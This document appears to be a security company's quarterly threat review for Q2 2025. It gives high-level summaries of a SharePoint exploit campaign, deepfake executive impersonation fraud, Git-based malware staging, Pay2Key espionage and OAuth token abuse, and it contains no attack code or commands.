Q2 2025 in review: nation-state tactics, trusted tools abused, and zero-day fatigue sets in

Q2 2025 brought a mix of stealthy nation-state operations, increasingly abused trusted platforms, and multiple critical vulnerabilities—many of which hit defenders before they hit the news. While some trends from Q1 continued (e.g., Git repo abuse and API exploitation), others escalated with sharper precision and geopolitical overtones.

From global frameworks being bypassed to vendor ecosystems being silently co-opted, Q2 was a quarter of subtle breaches with high-consequence impact.

1.Microsoft SharePoint exploit weaponized at scale

Date of escalation: April 2, 2025

Following the Q1 disclosure of CVE-2025-21517, exploitation scaled in early April. Multiple confirmed incidents affected public sector networks and critical infrastructure operators using hybrid SharePoint setups.

While patches were available, many systems remained vulnerable due to overlooked internal deployments.

Notably, several attacks left no logs of traditional lateral movement, instead chaining SharePoint-to-Azure sync misconfigurations.

2.AI-powered deepfakes used in real-time corporate impersonation attacks

Date reported: April 17, 2025

Security agencies issued coordinated warnings after multiple victims fell for real-time video impersonations of CFOs and CISOs, with threat actors using AI to simulate executive presence on Zoom and Teams.

In at least two cases, wire transfers over $400K were approved after calls with cloned avatars.

The FBI, ENISA, and JPCERT issued bulletins urging organizations to validate voice/video requests using separate channels.

3.GitHub and GitLab abused for staged malware delivery

Ongoing escalation: April–June 2025

Building on Q1’s trend, multiple attackers embedded payloads in Git repositories and leveraged legitimate CI/CD tools to execute staged infections.

The twist this quarter: payloads were encoded into markdown files, changelogs, and even GitHub Actions workflows.

The trusted tooling attack surface is now broader than ever—especially for dev-centric organizations.

4.Pay2Key-linked espionage campaigns expand to Asia-Pacific

Wave detected: May 2025

Following their Q1 reappearance, the Iranian-linked Pay2Key group expanded its footprint into Singapore, Hong Kong, and Seoul.

Rather than encryption, their malware focused on credential theft, SharePoint exfiltration, and AD mapping.

Cyber Protocol threat teams observed no ransom notes—just quiet persistence.

Indicators of compromise were shared across private intel sharing circles by mid-May.

5.New exploitation chain targets OAuth misconfigurations

First observed: June 12, 2025

Researchers disclosed a multi-step attack chain allowing attackers to abuse OAuth token scopes in Microsoft 365, Okta, and GitHub Enterprise.

Once initial access was gained, silent consent grant escalation enabled access to email, SharePoint, and Teams data—without triggering login alerts.

This highlights the growing risk of token-based trust models without proper revocation hygiene.

Trends worth tracking

• Deepfakes are operational. These are no longer “future risks”—they’re being used today for financial fraud and credential harvesting.
• Version-controlled malware is real. Git-based trust assumptions must be revisited entirely.
• Post-authentication abuse is the new norm. Most Q2 attacks began with a legitimate login—and escalated from there.
• Security fatigue is spreading. With a near-weekly wave of patches, many orgs are prioritizing speed over discipline—and attackers are noticing.

Final word

If Q1 was the warning shot, Q2 was confirmation:

The tools you trust—identity platforms, version control, collaboration software—are now attack surfaces.

And the faces you think you recognize? Those may not be real either.